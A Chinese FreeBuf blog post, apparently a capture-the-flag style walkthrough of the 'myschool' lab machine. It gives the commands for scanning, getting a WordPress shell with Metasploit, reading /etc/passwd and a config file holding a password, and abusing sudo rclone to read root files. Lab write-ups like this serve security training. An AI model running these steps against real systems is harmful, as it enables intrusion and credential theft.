freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

靶机myschool渗透测试
2021-11-20 16:46:00

靶机下载:myschool

  • 确定靶机的IP地址

命令:netdiscover -r 192.168.217.0/24

备注:其中192.168.217.0/24是局域网的范围地址,其中192.168.217.149就是靶机的IP地址。

  • 确定开放的端口:

命令:nmap -p- 192.168.217.149

备注:nmap -p- xxx.xxx.xxx.xxx表示扫描该IP地址下的全部端口。

由此能够看出来,该IP地址开放了3306 、80、8080等敏感端口。

  • 浏览器访问两个端口对应的IP地址:

http://192.168.217.149/

http://192.168.217.149:8080/

  • 通过浏览页面,发现8080端口是用来安装wordpress,设置后之后就可以通过后台getshell

  • 使用metasploit上传文件来getshell

msfconsole

查看这个工具的用法

info exploit/unix/webapp/wp_admin_shell_upload

use exploit/unix/webapp/wp_admin_shell_upload

show options

set PASSWORD admin

set RHOSTS 192.168.217.149

set RPORT 8080

set USERNAME admin

run

  • 连接成功后,进行提权

打开TTL终端

shell

python -c 'import pty; pty.spawn("/bin/bash")'

从页面看存在这个用户

cat /etc/passwd   查看该文件,也存在这个用户

通过浏览器文件,发现存在配置文件内容,该文件下存在密码,猜测可能是用户armour的密码

cat /var/www/html/cmsms/config.php

尝试进行登录连接

su armour

Password: SW)#$of4-9056d

sudo -l 列出目前用户可执行与无法执行的指令。

查看该命令的用法 rclone -h ,发现有cat命令

sudo rclone ls /root

sudo rclone cat /root/proof.txt

# 渗透测试 # 靶机环境
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者